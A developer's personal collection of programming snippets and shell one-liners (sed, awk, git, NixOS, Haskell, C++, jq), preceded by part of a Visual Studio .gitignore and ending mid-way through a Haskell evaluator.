*.pgc | |
*.pgd | |
*.rsp | |
*.sbr | |
*.tlb | |
*.tli | |
*.tlh | |
*.tmp | |
*.tmp_proj | |
*_wpftmp.csproj | |
*.log | |
*.vspscc | |
*.vssscc | |
.builds | |
*.pidb | |
*.svclog | |
*.scc | |
# Chutzpah Test files | |
_Chutzpah* | |
# Visual C++ cache files | |
ipch/ | |
*.aps | |
*.ncb | |
*.opendb | |
*.opensdf | |
*.sdf | |
*.cachefile | |
*.VC.db | |
*.VC.VC.opendb | |
# Visual Studio profiler | |
*.psess | |
*.vsp | |
*.vspx | |
*.sap | |
# Visual Studio Trace Files | |
*.e2e | |
# TFS 2012 Local Workspace | |
$tf/ | |
# Guidance Automation Toolkit | |
*.gpState | |
# ReSharper is a .NET coding add-in | |
_ReSharper*/ | |
*.[Rr]e[Ss]harper | |
*.DotSettings.user | |
# JustCode is a .NET coding add-in | |
.JustCode | |
# TeamCity is a build add-in | |
_TeamCity* | |
# DotCover is a Code Coverage Tool | |
*.dotCover | |
# AxoCover is a Code Coverage Tool | |
.axoCover/* | |
!.axoCover/settings.json | |
# Visual Studio code coverage results | |
*.coverage | |
*.coveragexml | |
# NCrunch | |
_NCrunch_* | |
.*crunch*.local.xml | |
nCrunchTemp_* | |
# MightyMoose | |
*.mm.* | |
AutoTest.Net/ | |
# Web workbench (sass) | |
.sass-cache/ | |
# Installshield output folder | |
[Ee]xpress/ | |
# DocProject is a documentation generator add-in | |
DocProject/buildhelp/ | |
DocProject/Help/*.HxT | |
DocProject/Help/*.HxC | |
DocProject/Help/*.hhc | |
DocProject/Help/*.hhk | |
DocProject/Help/*.hhp | |
DocProject/Help/Html2 | |
DocProject/Help/html | |
# Click-Once directory | |
publish/ | |
# Publish Web Output | |
*.[Pp]ublish.xml | |
*.azurePubxml | |
# Note: Comment the next line if you want to checkin your web deploy settings, | |
# but database connection strings (with potential passwords) will be unencrypted | |
*.pubxml | |
*.publishproj | |
# Microsoft Azure Web App publish settings. Comment the next line if you want to | |
# checkin your Azure Web App publish settings, but sensitive information contained | |
# in these scripts will be unencrypted | |
PublishScripts/ | |
# NuGet Packages | |
*.nupkg | |
# The packages folder can be ignored because of Package Restore | |
**/[Pp]ackages/* | |
# except build/, which is used as an MSBuild target. | |
!**/[Pp]ackages/build/ | |
# Uncomment if necessary however generally it will be regenerated when needed | |
#!**/[Pp]ackages/repositories.config | |
# NuGet v3's project.json files produces more ignorable files | |
*.nuget.props | |
*.nuget.targets | |
# Microsoft Azure Build Output | |
csx/ | |
*.build.csdef | |
# Microsoft Azure Emulator | |
ecf/ | |
rcf/ | |
# Windows Store app package directories and files | |
AppPackages/ | |
BundleArtifacts/ | |
Package.StoreAssociation.xml | |
_pkginfo.txt | |
*.appx | |
# Visual Studio cache files | |
# files ending in .cache can be ignored | |
*.[Cc]ache | |
# but keep track of directories ending in .cache | |
!*.[Cc]ache/ | |
# Others | |
ClientBin/ | |
~$* | |
*~ | |
*.dbmdl | |
*.dbproj.schemaview | |
*.jfm | |
*.pfx | |
*.publishsettings | |
orleans.codegen.cs | |
# Including strong name files can present a security risk | |
# (https://github.com/github/gitignore/pull/2483#issue-259490424) | |
#*.snk | |
# Since there are multiple workflows, uncomment next line to ignore bower_components | |
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) | |
#bower_components/ | |
# RIA/Silverlight projects | |
Generated_Code/ | |
# Backup & report files from converting an old project file | |
# to a newer Visual Studio version. Backup files are not needed, | |
# because we have git ;-) | |
_UpgradeReport_Files/ | |
Backup*/ | |
UpgradeLog*.XML | |
UpgradeLog*.htm | |
ServiceFabricBackup/ | |
*.rptproj.bak | |
# SQL Server files | |
*.mdf | |
*.ldf | |
*.ndf | |
# Business Intelligence projects | |
*.rdl.data | |
*.bim.layout | |
*.bim_*.settings | |
*.rptproj.rsuser | |
# Microsoft Fakes | |
FakesAssemblies/ | |
# GhostDoc plugin setting file | |
*.GhostDoc.xml | |
# Node.js Tools for Visual Studio | |
.ntvs_analysis.dat | |
node_modules/ | |
# Visual Studio 6 build log | |
*.plg | |
# Visual Studio 6 workspace options file | |
*.opt | |
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) | |
*.vbw | |
# Visual Studio LightSwitch build output | |
**/*.HTMLClient/GeneratedArtifacts | |
**/*.DesktopClient/GeneratedArtifacts | |
**/*.DesktopClient/ModelManifest.xml | |
**/*.Server/GeneratedArtifacts | |
**/*.Server/ModelManifest.xml | |
_Pvt_Extensions | |
# Paket dependency manager | |
.paket/paket.exe | |
paket-files/ | |
# FAKE - F# Make | |
.fake/ | |
# JetBrains Rider | |
.idea/ | |
*.sln.iml | |
# CodeRush personal settings | |
.cr/personal | |
# Python Tools for Visual Studio (PTVS) | |
__pycache__/ | |
*.pyc | |
# Cake - Uncomment if you are using it | |
# tools/** | |
# !tools/packages.config | |
# Tabs Studio | |
*.tss | |
# Telerik's JustMock configuration file | |
*.jmconfig | |
# BizTalk build output | |
*.btp.cs | |
*.btm.cs | |
*.odx.cs | |
*.xsd.cs | |
# OpenCover UI analysis results | |
OpenCover/ | |
# Azure Stream Analytics local run output | |
ASALocalRun/ | |
# MSBuild Binary and Structured Log | |
*.binlog | |
# NVidia Nsight GPU debugger configuration file | |
*.nvuser | |
# MFractors (Xamarin productivity tool) working folder | |
.mfractor/ | |
# Local History for Visual Studio | |
.localhistory/ | |
--------------------------------- | |
[git: discard local commits] | |
git reset --hard @{u} | |
--------------------------------- | |
[haskell align bytes by 4] | |
align4 n | n `mod` 4 == 0 = n | otherwise = align4 $ n + 1 | |
--------------------------------- | |
[haskell my sorter] | |
sorter n xs | null xs = n:[] | n < head xs = n:xs | otherwise = (head xs):g n (tail xs) | |
--------------------------------- | |
[go get howto] | |
go get github.com/natefinch/npipe | |
--------------------------------- | |
[haskell ternary] | |
main = undefined | |
data Cond a = a :? a | |
infixl 0 ? | |
infixl 1 :? | |
(?) :: Bool -> Cond a -> a | |
True ? (x :? _) = x | |
False ? (_ :? x) = x | |
--------------------------------- | |
[haskell function composition] | |
{- | |
Function Composition: | |
1) 3 is feed into h (not 3 and 7) | |
2) The result of `h 3` is a function | |
3) The result function and the next parameter 7 become inputs to g | |
4) g does its thing | |
conclusion: function composition requires carefully crafted | |
function-type to the left of `.` such that whatever is the | |
return value to its right is input to its left. | |
Function composition operates on single parameter passing | |
But I don't understand why `e` works but not `d` | |
-} | |
d n = n+1 | |
e n = n | |
g f p = f p | |
h a b = a + b | |
main = do | |
let ans = (e.g.h) 3 7 | |
putStrLn $ "result = " ++ show ans | |
--------------------------------- | |
[haskell:inc_x my first art] | |
-- original construct | |
inc_x' acc e = | |
[ if fst e == fst q then (fst q,1 + (snd q)) else q | | |
q <- acc ] | |
-- a week later | |
inc_x acc (x,_) = | |
[ (p,q) | | |
(a,b) <- acc, | |
let (p,q) | |
| a == x = (a,b+1) | |
| otherwise = (a,b) ] | |
--------------------------------- | |
[c++ unbuffered cout] | |
#include <iostream> | |
#include <thread> | |
#include <chrono> | |
int main () { | |
#if N==1 | |
std::setbuf (stdout,nullptr); // this | |
#elif N==2 | |
char buf[3]; | |
std::setbuf (stdout,buf); | |
#elif N==3 | |
std::setvbuf (stdout,nullptr,_IONBF,0); // or this | |
#else | |
char buf[3]; | |
std::setvbuf (stdout,buf,_IOFBF,3); | |
#endif | |
for (int i = 0;i < 10; i++) { | |
std::this_thread::sleep_for (std::chrono::seconds(1)); | |
std::cout << "*"; | |
} | |
} | |
--------------------------------- | |
[python yaml to json] | |
python3 -c 'import sys,yaml,json; json.dump(yaml.load(sys.stdin),sys.stdout,indent=4)' < input.iml | |
--------------------------------- | |
[win32 concept map] | |
File Mapping Object: | |
url: https://docs.microsoft.com/en-us/windows/desktop/Memory/file-mapping | |
api: | |
- CreateFile | |
- CreateFileMapping | |
- MapViewOfFile | |
- UnmapViewOfFile | |
- GetLastError | |
- GetSystemInfo | |
- CloseHandle | |
- FlushViewOfFile | |
- VirtualProtect | |
struct: [SYSTEM_INFO] | |
errorcode: [NO_ERROR,ERROR_ALREADY_EXISTS,ERROR_FILE_INVALID] | |
flag: [GENERIC_READ,GENERIC_WRITE,PAGE_READWRITE] | |
param: [dwMaximumSizeHigh,dwMaximumSizeLow] | |
constraint: | |
- offset is multiple of file allocation granularity | |
notion: | |
- This 'file mapping object' is the size of the portion of the 'file' you want to view plus the offset into the 'file'. | |
- The 'file mapping object' can consist of all or only part of the 'file'. | |
- A 'file view' can consist of all or only part of the 'file mapping object'. | |
- A 'file view' must start at an offset into the file that is a multiple of the 'file allocation granularity'. | |
- A 'process' manipulates the 'file' through the 'file view'. | |
- When multiple 'processes' use the same 'file mapping object' to create 'views' for a local 'file', the data is coherent. | |
- To map the data from a 'file' to the 'virtual memory' of a 'process', you must create a 'view' of the 'file'. | |
- A file view size must be smaller than the file mapping object size. | |
- Multiple processes can also use memory-mapped files to share data. | |
- Misinvariance shall cause CreateFileMapping to fail | |
formula: | |
- dwFileMapStart = (FILE_MAP_START / dwSysGran) * dwSysGran; | |
- dwMapViewSize = (FILE_MAP_START % dwSysGran) + BUFFSIZE; | |
--------------------------------- | |
[g++ include paths] | |
g++ -E -Wp,-v -xc++ /dev/null | |
--------------------------------- | |
[gcc include paths] | |
gcc -E -Wp,-v -xc /dev/null | |
--------------------------------- | |
[add memset] | |
include: | |
c: | |
memcpy: string.h | |
memset: string.h | |
lseek: [sys/types.h,unistd.h] | |
printf: stdio.h | |
realloc: stdlib.h | |
assert: assert.h | |
c++: | |
cout: iostream | |
--------------------------------- | |
[improving myconio with portable kbhit] | |
#include <termios.h> | |
#include <unistd.h> | |
#include <stdio.h> | |
#include <sys/ioctl.h> | |
#include <sys/select.h> | |
/* Generate object file: gcc -c myconio.c | |
* In your C++ code, declare functions as: | |
* | |
* extern "C" { | |
* int getch (void); | |
* int getche (void); | |
* int _kbhit (void); | |
* } | |
* | |
* g++ -o yourapp yourapp.cpp myconio.o | |
* | |
* You can also combine several *.o into a *.a | |
* ar rcs myconio.a myconio.o helpers.o | |
* | |
* And statically linked the same with: | |
* g++ -o yourapp yourapp.cpp myconio.a | |
* | |
* Or create a dynamic library by: | |
* gcc -shared myconio.o -o myconio.dll | |
* # note: In cygwin, it must be in dll suffix! | |
* g++ -o win win.cpp -L./ -lmyconio | |
* | |
* Of course, the app and the dll must be beside | |
* each other or use PATH (LD_LIBRARY_PATH not | |
* honored here in cygwin). | |
* | |
* References: | |
* - https://stackoverflow.com/questions/29335758/using-kbhit-and-getch-on-linux | |
*/ | |
/* reads from keypress, doesn't echo */ | |
int getch(void) | |
{ | |
struct termios oldattr, newattr; | |
int ch; | |
tcgetattr( STDIN_FILENO, &oldattr ); | |
newattr = oldattr; | |
newattr.c_lflag &= ~( ICANON | ECHO ); | |
tcsetattr( STDIN_FILENO, TCSANOW, &newattr ); | |
ch = getchar(); | |
tcsetattr( STDIN_FILENO, TCSANOW, &oldattr ); | |
return ch; | |
} | |
/* reads from keypress, echoes */ | |
int getche(void) | |
{ | |
struct termios oldattr, newattr; | |
int ch; | |
tcgetattr( STDIN_FILENO, &oldattr ); | |
newattr = oldattr; | |
newattr.c_lflag &= ~( ICANON ); | |
tcsetattr( STDIN_FILENO, TCSANOW, &newattr ); | |
ch = getchar(); | |
tcsetattr( STDIN_FILENO, TCSANOW, &oldattr ); | |
return ch; | |
} | |
/* http://www.flipcode.com/archives/_kbhit_for_Linux.shtml */ | |
int more_portable() { | |
struct timeval timeout; | |
fd_set rdset; | |
FD_ZERO(&rdset); | |
FD_SET(STDIN_FILENO, &rdset); | |
timeout.tv_sec = 0; | |
timeout.tv_usec = 0; | |
return select(STDOUT_FILENO, &rdset, NULL, NULL, &timeout); | |
} | |
int _kbhit(void) { | |
static int initialized = 0; | |
if (! initialized) { | |
// Use termios to turn off line buffering | |
struct termios term; | |
tcgetattr(STDIN_FILENO, &term); | |
term.c_lflag &= ~ICANON; | |
tcsetattr(STDIN_FILENO, TCSANOW, &term); | |
setbuf(stdin, NULL); | |
initialized = 1; | |
} | |
#if 0 | |
int bytesWaiting; | |
ioctl(STDIN_FILENO, FIONREAD, &bytesWaiting); | |
return bytesWaiting; | |
#else | |
return more_portable(); | |
#endif | |
} | |
--------------------------------- | |
[haskell gadts] | |
{-# LANGUAGE GADTs #-} | |
import Prelude hiding (Word) | |
main = undefined | |
data Term a where | |
Word::String -> Term Integer | |
Equals::(Eq a) => Term a -> Term a -> Term Bool | |
Plus::Term Integer -> Term Integer -> Term Integer | |
--------------------------------- | |
[haskell nesting where clauses] | |
-- how to nest where clauses | |
f = a | |
where | |
a = b | |
where b = 3 | |
g = a | |
where a = b | |
where b = 3 | |
--------------------------------- | |
[fsnotify duplicate events] | |
[0 dx@t440:~/src/fp] | |
$ filemon | |
2018/11/02 12:46:42 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:42 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/4913": REMOVE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": RENAME | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs~": CREATE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": CREATE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/nadia.hs | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": CHMOD | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs~": REMOVE | |
2018/11/02 12:46:52 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:52 modified file: /home/dx/src/fp/.nadia.hs.swp | |
^C | |
[130 dx@t440:~/src/fp] | |
$ | |
--------------------------------- | |
[golang tips] | |
go get github.com/fsnotify/fsnotify | |
# For Windows cygwin environment, just launch `git bash` and do the `go get` from there | |
- go get -v github.com/bronze1man/yaml2json/y2jLib | |
- cd $GOPATH/src/github.com/bronze1man/ | |
- go build | |
- go install | |
- make sure $GOPATH/bin is in your $PATH | |
- You can now use yaml2json.exe | |
--------------------------------- | |
[c++ is not superset of c anymore] | |
int main() { | |
int e = 1, a = 2, b = 3, c = 4, d = 5; | |
e = a ? b : c = d; | |
return e; | |
} | |
--------------------------------- | |
[c++ unique_ptr] | |
#include <iostream> | |
#include <memory> | |
class Node { | |
public: | |
Node() {std::cout << "conx";} | |
~Node() {std::cout << "destx";} | |
}; | |
int main (int argc, char *argv[]) | |
{ | |
std::unique_ptr<Node> p(new Node); | |
//Node*p = new Node; | |
return 0; | |
} | |
--------------------------------- | |
[c++ thread] | |
#include <iostream> | |
#include <thread> | |
#include <future> | |
#include <chrono> | |
void f(std::string s,int delay) | |
{ | |
std::cout << "from: " << s << delay << std::endl; | |
std::this_thread::sleep_for(std::chrono::seconds(delay)); | |
} | |
int threadFunc (int a,int b) | |
{ | |
while (true) { | |
f("threadFunc",1); | |
} | |
} | |
int main (int argc, char *argv[]) | |
{ | |
std::thread t (threadFunc,3,5); | |
std::string input; | |
int n; | |
while (true) { | |
std::cout << "INPUT?\n"; | |
std::getline(std::cin,input); | |
n = atoi(input.c_str()); | |
f("main",n); | |
} | |
std::cout << "****\n"; | |
t.join(); | |
return 0; | |
} | |
--------------------------------- | |
[howto sync from upstream a cloned nixpkgs master and release-18.09 branches] | |
https://asciinema.org/a/lv9v5mh1GGQJsfKIzUSlzsg7i | |
--------------------------------- | |
[git sync nixpkgs repo] | |
? git remote update channels | |
? git rebase channels/nixos-18.09 | |
- git clone git://github.com/NixOS/nixpkgs.git | |
- nixos-rebuild switch -I nixpkgs=/path/to/my/nixpkgs | |
Nixos Sequence: | |
- git clone ssh://[email protected]/truthadjustr/nixpkgs.git | |
- git remote add upstream https://github.com/NixOS/nixpkgs.git | |
? git remote add channels https://github.com/NixOS/nixpkgs-channels.git | |
? git remote update channels | |
- git fetch upstream | |
- git checkout master | |
- git merge upstream/master | |
- git push -u origin master | |
- git checkout --track origin/release-18.09 | |
- git merge upstream/release-18.09 | |
- git push -u origin release-18.09 | |
----------------------- | |
My git sequence to sync my nixpgks clone: | |
1.) git checkout master | |
2.) git fetch upstream | |
3.) git merge upstream/master | |
4.) git push | |
5.) git checkout release-18.09 | |
6.) git merge upstream/release-18.09 | |
7.) git push | |
8.) git remote update channels | |
--------------------------------- | |
[shell if-else inside Makefile] | |
nothing: | |
@echo | |
action: | |
@echo "you passed: ${ARGS}" | |
@if [[ "${ARGS}" = "apple" ]];then \ | |
echo "red";\ | |
else \ | |
echo "yellow";\ | |
fi; | |
--------------------------------- | |
[git sequence] | |
? git remote update channels | |
? git rebase channels/nixos-18.09 | |
- git clone git://github.com/NixOS/nixpkgs.git | |
- nixos-rebuild switch -I nixpkgs=/path/to/my/nixpkgs | |
Nixos Sequence: | |
- git clone ssh://[email protected]/truthadjustr/nixpkgs.git | |
- git remote add upstream https://github.com/NixOS/nixpkgs.git | |
? git remote add channels https://github.com/NixOS/nixpkgs-channels.git | |
? git remote update channels | |
- git fetch upstream | |
- git checkout master | |
- git merge upstream/master | |
- git push -u origin master | |
- git checkout --track origin/release-18.09 | |
- git merge upstream/release-18.09 | |
- git push -u origin release-18.09 | |
--------------------------------- | |
[how to get even with nixos master and release-18.09 in your fork] | |
https://asciinema.org/a/VRKXqNMG2C7dtCgxPbyfdV2qX | |
--------------------------------- | |
[nixos channels vs release?] | |
https://asciinema.org/a/nTTbvSj9subD02JqbBQfoYu9t | |
--------------------------------- | |
[nixos master sync] | |
https://asciinema.org/a/5IfSruL3gbIgTgULHzSZuoS9t | |
--------------------------------- | |
[nixos keep up-to-date] | |
https://asciinema.org/a/U2wGcQi8yS3tolnFtZhK38SBW | |
--------------------------------- | |
[sed add in groups of 3] | |
sed -n '$!N;$!N;s/\n/+/g;$!p;${s/\n/+/g;p}' input | |
--------------------------------- | |
[sed in groups of 3] | |
sed -n '$!{N};$!{N};$!{s/\n/+/g;p};${s/\n/+/g;p}' input.txt | |
--------------------------------- | |
[sed tricks (secret)] | |
sed '/Administration/{s/Administration/Supervision/;:loop n;b loop}' thegeekstuff.txt | |
sed 's/^ */&\n/;:loop s/^\n//;s/ \n/\n+/;t loop' thegeekstuff.txt | |
echo 1234 | sed ':loop s/\(.*[0-9]\)\([0-9]\{3\}\)/\1,\2/;t loop' | |
sed ':loop /\\$/N;s/\\\n */ /;t loop' thegeekstuff2.txt | |
sed '/</{:loop s/<[^<]*>//g;/</{N;b loop}}' index.html | |
sed ':loop $!{N;b loop};s/".*"//g' thegeekstuff.txt | |
sed -n '1!G;h;$p' nums.txt | |
--------------------------------- | |
[tac by sed] | |
"sed -n '1!G;h;' nums.txt" | |
--------------------------------- | |
[sed is devious] | |
"sed -n ':loop H;!b loop;${x;p}' nums.txt" | |
--------------------------------- | |
[sed lesson 2] | |
sed -e ':loop $!{N;/\n$/!b loop};s/"[^"]*"//g' thegeekstuff.txt | |
--------------------------------- | |
[sed lesson1] | |
sed '/Administration/{s/Administration/Supervision/;:loop n;b loop}' thegeekstuff.txt | |
--------------------------------- | |
[sed wisdom] | |
echo 'aa bb cc dd' | sed ':label s/ /+/;t label' | |
--------------------------------- | |
[nix-shell ghc844] | |
nix-shell -I nixpkgs=https://github.com/NixOS/nixpkgs-channels/archive/nixos-unstable.tar.gz -p haskell.compiler.ghc844 | |
--------------------------------- | |
[sed squeeze spaces into a space] | |
sed 's/ \+/ /g' | |
--------------------------------- | |
[bash array gotchas] | |
https://asciinema.org/a/5Z0jIaR20AoPP9HsQWI0hVC5j | |
--------------------------------- | |
[bash printf vs echo on arrays. tsk tsk] | |
tokens=($(ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile | ~/.fk/ctags.awk -v a=1)) | |
#echo ${#tokens[@]} | |
#printf "%s " ${tokens[@]} | |
#echo "${tokens[@]}" | |
if((${#tokens[@]} > 0));then | |
#printf "%s %s " $ifile ${tokens[@]} >> $ofile | |
echo "$ifile ${tokens[@]}" >> $ofile | |
fi | |
--------------------------------- | |
[bash after] | |
#!/run/current-system/sw/bin/bash | |
# | |
[ $# -lt 2 ] && exit 1 | |
ifile=$PWD/${1#"./"} | |
flags=$2 | |
ofile=${3:-/dev/stdout} | |
line="$ifile" | |
while read c;do | |
line="$line "$c | |
done < <(ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile \ | |
| ~/.fk/ctags.awk -v a=1) | |
case "$line" in | |
*\ *) | |
printf "$line\n" >> $ofile | |
;; | |
esac | |
--------------------------------- | |
[bash before] | |
#!/run/current-system/sw/bin/bash | |
# | |
[ $# -lt 2 ] && exit 1 | |
ifile=$PWD/${1#"./"} | |
flags=$2 | |
ofile=${3:-/dev/stdout} | |
printf "$ifile" >> $ofile | |
ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile \ | |
| ~/.fk/ctags.awk -v a=1 | while read c;do | |
printf " $c" >> $ofile | |
done | |
echo >> $ofile | |
sed -i '/ /!d' $ofile 2>/dev/null | |
--------------------------------- | |
[cat tip on how to squeeze blank lines] | |
cat -s | |
--------------------------------- | |
[find trick] | |
find . -type f \( -name '*.h' -o -name '*.cpp' \) -printf '%P\n' | |
--------------------------------- | |
[c++ forward declare] | |
class B; | |
class C {}; | |
class A : public C { | |
B *b; // only pointer can forward declare | |
}; | |
class B { | |
public: | |
B() {} | |
}; | |
int main (int argc,char *argv[]) | |
{ | |
return 0; | |
} | |
--------------------------------- | |
[awk trick] | |
ctags -x --c++-kinds=mv --extra=q ~/tmp/f3.cpp | awk '$2 == "member" && $1 ~/::/ { print $0}' | |
--------------------------------- | |
[sed replace multiple spaces with 1 space] | |
sed -n 's/ \+/ /gp' /tmp/n | |
--------------------------------- | |
[~/.ssh/config for git cli] | |
Host daixtr.github.com | |
HostName github.com | |
IdentityFile ~/.ssh/id_rsa2 | |
User git | |
--------------------------------- | |
[git fetch upstream demo] | |
https://asciinema.org/a/yrxkzXr3KFfidE44K7XbERVdU | |
--------------------------------- | |
[Rigorous way to find where a C++ class is defined] | |
find . -type f \( -name '*.h' -o -name '*.cpp' \) -exec sh -c "ctags -x --c++-kinds=c --language-force=c++ {} | grep -w -n CSmeagol" \; | |
--------------------------------- | |
[awk skipping duplicates based on column] | |
oeuoeu 4 apple | |
o 9 banana | |
xxxx 4 ALREADY DUPLICATE | |
yyyyyyy 3 this is a test | |
ouuuuuuuuuuu 9 ALREADY DUPLICATE | |
ataya 4 this is ALREADY DUPLICATE | |
awk '!seen[$2]++' /tmp/record | |
--------------------------------- | |
[nix-shell --pure] | |
https://asciinema.org/a/fkm2V5Qqxpjizq2N27T5zo4aL | |
--------------------------------- | |
[python lambda in list comprehension] | |
a = ['one 1', 'two 2', 'three 3'] | |
b = [(lambda a,b:(a,b))(*x.split()) for x in a] | |
print(b) | |
c = [('one',1), ('two', 2), ('three', 3)] | |
k = [(lambda p,q:p + " => " + str(q))(x,y) for (x,y) in c] | |
print(k) | |
--------------------------------- | |
[python elasticsearch indices] | |
from elasticsearch import Elasticsearch | |
import json,time,requests | |
es = Elasticsearch(host='elastic-local-node') | |
# curl "http://$ES:9200/_cat/indices?v&h=index,docs.count&s=docs.count:desc" | |
url = "http://elastic-local-node:9200/_cat/indices" | |
res = requests.get("http://elastic-local-node:9200/_cat/indices?v&h=index,docs.count&s=docs.count:desc") | |
if res.headers['content-type'] == 'text/plain; charset=UTF-8': | |
indices_ = filter(lambda x: not x.startswith('.') ,res.text.split('\n')) | |
indices = [(e.split()[0],e.split()[1]) for e in indices_ if len(e.split()) == 2] | |
for index in indices[1:]: | |
print(index) | |
else: | |
print("print res.json() instead?") | |
#for index in es.indices.get('*') | |
# print(index) | |
--------------------------------- | |
[jq tips] | |
jq '.' ~/es_response.json | |
# or | |
jq '.hits.total' ~/es_response.json | |
jq '.hits.hits|length' ~/es_response.json | |
jq '.hits.hits[3]' ~/es_response.json | |
# Use double quetos when special symbol @ in field | |
jq '.hits.hits[]._source."@timestamp"' response.json | |
--------------------------------- | |
[jq howto] | |
jq < ~/es_response.json '.hits.total' | |
# or | |
jq '.hits.total' ~/es_response.json | |
--------------------------------- | |
[python3 pip upgrade] | |
python3 -m pip install --upgrade pip | |
--------------------------------- | |
[using python3's built-in pip] | |
python3 -m pip install elasticsearch | |
--------------------------------- | |
[cscope] | |
cscope -RCbk | |
--------------------------------- | |
[haskell append] | |
append xa xb | |
| xa == [] = xb | |
| xb == [] = xa | |
| otherwise = p:append q xb | |
where | |
p = head xa | |
q = tail xa | |
--------------------------------- | |
[haskell prompt config ~/.ghci] | |
:set prompt "\ESC[0;34m\STX%s\n\ESC[1;31m\STXλ> \ESC[m\STX" | |
--------------------------------- | |
[haskell ~/.ghci config 2] | |
:set prompt "\x03BB> " | |
--------------------------------- | |
[haskell ~/.ghci config] | |
:set prompt "\ESC[1;31mλ> \ESC[m" | |
--------------------------------- | |
[haskell makeSet first blood] | |
makeSet xs = foldl (\x y -> if y `elem` x then x else y:x) [] xs | |
makeSet2 acc [] = acc | |
makeSet2 acc (x:xs) | |
| x `elem` acc = makeSet2 acc xs | |
| otherwise = makeSet2 (x:acc) xs | |
--------------------------------- | |
[decimal to binary convert in bc] | |
echo 'obase=2;5'|bc | |
--------------------------------- | |
[bc floating point divide] | |
echo '5/2'|bc -l | |
--------------------------------- | |
[another way grep is true if finds a tab] | |
grep $'\t' /tmp/telepathy.sh | |
--------------------------------- | |
[grep is true if finds a tab] | |
grep -P '\t' /tmp/telepathy.sh | |
--------------------------------- | |
[bash string split] | |
s="cunt 7";arr=(${s// / });# arr[0] = cunt, arr[1] = 7 | |
--------------------------------- | |
[feed lines into while loop, skipping blank and commented] | |
while read x;do echo $x;done < <(grep -v -E '^#|^$|^[[:space:]]' proj.lst) | |
--------------------------------- | |
[grep skip empty lines] | |
grep -v -E '^#|^$|^[[:space:]]' /tmp/fc | |
--------------------------------- | |
[sed remove spaces before dollar] | |
sed 's/.*$/$/' /tmp/xxxxx | |
--------------------------------- | |
[ampersand inside xml] | |
<!-- how to encode ampersand inside xml --> | |
<a>&</a> | |
--------------------------------- | |
[xml format] | |
xml fo -s 4 /tmp/n | |
--------------------------------- | |
[extract file extension in bash] | |
h='/aaa/bbb/file.c';echo ${h##*.} | |
--------------------------------- | |
[bash check file zero size] | |
[ -s /tmp/a1 ] && echo "notempty" || echo "empty" | |
--------------------------------- | |
[sed remove trailing spaces] | |
sed -i 's/[[:blank:]]*$//' | |
--------------------------------- | |
[useful find command (excludes, content-only delete)] | |
# Useful `find` commands: | |
find . \( -path ./dir1 -o -path ./.git \) -prune -o -type d \( -name Debug -o -name Release \) -exec rm -rf {} \; | |
find Lib/ -type d \( -name Debug -o -name Release \) -exec sh -c 'rm -rf {}/*' \; | |
--------------------------------- | |
[xmlstarlet search multiple xpaths] | |
showsrc is a function | |
showsrc () | |
{ | |
[ $# -eq 0 ] && return 1; | |
local F=$1; | |
xml sel -N x="http://schemas.microsoft.com/developer/msbuild/2003" -t -m //x:ClCompile/@Include -v . -n -m //x:ClInclude/@Include -v . -n $F | sort | uniq -ic | sort -rn | |
} | |
--------------------------------- | |
[haskell armature] | |
{- Expected behavior: | |
fx [2,4,1,5,3] = 2+4-1+5-3 | |
fx [] = 0 | |
f0 was my initial incorrect attempt | |
f1, f2 and f3 behave correctly -} | |
f0 (x:xs) = foldl (\a b -> (a + b) * t a) x xs | |
where | |
t n | n > 0 = -1 | otherwise = 1 | |
f3 (x:xs) = add x xs | |
where | |
add v [] = v | |
add v (x:xs) = sub (v + x) xs | |
sub v [] = v | |
sub v (x:xs) = add (v - x) xs | |
f3 [] = 0 | |
f1 (x:xs) = sum $ x:zipWith (*) (cycle [1,-1]) xs | |
f1 [] = 0 | |
f2 (x:xs) = sum $ x:zipWith (\a b -> | |
case a `mod` 2 of | |
0 -> b | |
otherwise -> -b | |
) [0..] xs | |
f2 [] = 0 | |
--------------------------------- | |
[Windows ldap] | |
nslookup -type=all _ldap._tcp | |
--------------------------------- | |
[qv instead of hexedit] | |
qv is a function | |
qv () | |
{ | |
[ $# -eq 0 ] && return 1; | |
local F=$1; | |
od -w32 --endian=big -t x1z $F | |
} | |
--------------------------------- | |
[iconv or dos2unix] | |
iconv -f UTF-16LE -t UTF-8 resource.h > _resource.h | |
--------------------------------- | |
[od instead of hexedit] | |
od -w32 --endian=big -t x1z Resource.h | |
--------------------------------- | |
[configuration.nix] | |
boot.kernel.sysctl."vm.max_map_count" = 262144; | |
--------------------------------- | |
[haskell nayana] | |
import Data.Maybe | |
data Op = Add | Sub | Mul | Div | |
| And | Or | Not | Eq | |
| Less | Great | |
deriving (Eq, Show) | |
data Exp = Literal Value | |
| Primitive Op [Exp] | |
| Variable String | |
| If Exp Exp Exp | |
| Let [(String, Exp)] Exp | |
deriving (Show, Eq) | |
data Value = Number Int | |
| Bool Bool | |
| Fractional Float | |
| String String | |
deriving (Eq, Show) | |
type Env = [(String, Value)] | |
eval :: Env -> Exp -> Value | |
eval e (Literal v) = v | |
eval e (Variable x) = fromJust (lookup x e) --22 | |
prim :: Op -> [Value] -> Value | |
prim Add [Number a, Number b] = Number (a + b) | |
prim And [Bool a, Bool b] = Bool (a && b) | |
prim Sub [Number a, Number b] = Number (a - b) | |
